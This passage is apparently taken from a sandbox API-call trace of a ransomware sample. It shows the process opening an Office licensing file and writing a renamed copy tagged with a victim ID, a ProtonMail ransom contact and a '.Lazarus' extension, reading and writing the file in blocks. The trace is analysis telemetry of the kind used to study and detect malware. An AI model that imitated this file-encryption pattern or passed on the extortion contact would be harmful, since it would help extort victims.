Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4bd68 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4bd68 | out: hHeap=0x20000) returned 1 [0101.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0101.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0101.446] AreFileApisANSI () returned 1 [0101.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 105 [0101.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0101.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.446] AreFileApisANSI () returned 1 [0101.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0101.446] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.446] GetFileType (hFile=0x27c) returned 0x1 [0101.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.446] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.447] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.447] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.447] CloseHandle (hObject=0x27c) returned 1 [0101.447] AreFileApisANSI () returned 1 [0101.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0101.447] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.447] GetFileType (hFile=0x27c) returned 0x1 [0101.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.448] CloseHandle (hObject=0x27c) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0101.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0101.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0101.449] AreFileApisANSI () returned 1 [0101.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0101.450] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xda982389, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x902bb)) returned 1 [0101.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.450] AreFileApisANSI () returned 1 [0101.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.450] GetLastError () returned 0x0 [0101.450] SetLastError (dwErrCode=0x0) [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0101.450] GetLastError () returned 0x0 [0101.450] SetLastError (dwErrCode=0x0) [0101.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5fd18 [0101.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.451] AreFileApisANSI () returned 1 [0101.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fd18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 167 [0101.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14e) returned 0x5e870 [0101.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fd18, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=167 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 167 [0101.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.451] GetFileType (hFile=0x27c) returned 0x1 [0101.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0101.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0101.452] AreFileApisANSI () returned 1 [0101.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0101.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.452] GetFileType (hFile=0x368) returned 0x1 [0101.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0101.452] GetLastError () returned 0x0 [0101.452] SetLastError (dwErrCode=0x0) [0101.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0101.452] GetLastError () returned 0x0 [0101.452] SetLastError (dwErrCode=0x0) [0101.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0101.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0101.453] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0101.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0101.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0101.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0101.583] GetLastError () returned 0x0 [0101.583] SetLastError (dwErrCode=0x0) [0101.583] GetLastError () returned 0x0 [0101.583] SetLastError (dwErrCode=0x0) [0101.584] GetLastError () returned 0x0 [0101.584] SetLastError (dwErrCode=0x0) [0101.584] GetLastError () returned 0x0 [0101.584] SetLastError (dwErrCode=0x0) [0101.584] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.585] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.586] GetLastError () returned 0x0 [0101.586] SetLastError (dwErrCode=0x0) [0101.586] GetLastError () returned 0x0 [0101.586] SetLastError (dwErrCode=0x0) [0101.586] GetLastError () returned 0x0 [0101.586] SetLastError (dwErrCode=0x0) [0101.586] GetLastError () returned 0x0 [0101.586] SetLastError (dwErrCode=0x0) [0101.587] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.587] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.587] GetLastError () returned 0x0 [0101.587] SetLastError (dwErrCode=0x0) [0101.587] GetLastError () returned 0x0 [0101.587] SetLastError (dwErrCode=0x0) [0101.587] GetLastError () returned 0x0 [0101.587] SetLastError (dwErrCode=0x0) [0101.587] GetLastError () returned 0x0 [0101.587] SetLastError (dwErrCode=0x0) [0101.588] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.588] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.588] GetLastError () returned 0x0 [0101.588] SetLastError (dwErrCode=0x0) [0101.588] GetLastError () returned 0x0 [0101.588] SetLastError (dwErrCode=0x0) [0101.588] GetLastError () returned 0x0 [0101.588] SetLastError (dwErrCode=0x0) [0101.588] GetLastError () returned 0x0 [0101.588] SetLastError (dwErrCode=0x0) [0101.588] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.589] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.589] GetLastError () returned 0x0 [0101.589] SetLastError (dwErrCode=0x0) [0101.589] GetLastError () returned 0x0 [0101.589] SetLastError (dwErrCode=0x0) [0101.589] GetLastError () returned 0x0 [0101.589] SetLastError (dwErrCode=0x0) [0101.589] GetLastError () returned 0x0 [0101.589] SetLastError (dwErrCode=0x0) [0101.589] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.590] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.590] GetLastError () returned 0x0 [0101.590] SetLastError (dwErrCode=0x0) [0101.590] GetLastError () returned 0x0 [0101.590] SetLastError (dwErrCode=0x0) [0101.590] GetLastError () returned 0x0 [0101.590] SetLastError (dwErrCode=0x0) [0101.590] GetLastError () returned 0x0 [0101.590] SetLastError (dwErrCode=0x0) [0101.590] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.590] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.591] GetLastError () returned 0x0 [0101.591] SetLastError (dwErrCode=0x0) [0101.591] GetLastError () returned 0x0 [0101.591] SetLastError (dwErrCode=0x0) [0101.591] GetLastError () returned 0x0 [0101.591] SetLastError (dwErrCode=0x0) [0101.591] GetLastError () returned 0x0 [0101.591] SetLastError (dwErrCode=0x0) [0101.591] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.591] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.591] GetLastError () returned 0x0 [0101.592] SetLastError (dwErrCode=0x0) [0101.592] GetLastError () returned 0x0 [0101.592] SetLastError (dwErrCode=0x0) [0101.592] GetLastError () returned 0x0 [0101.592] SetLastError (dwErrCode=0x0) [0101.592] GetLastError () returned 0x0 [0101.592] SetLastError (dwErrCode=0x0) [0101.592] ReadFile (in: hFile=0x368, 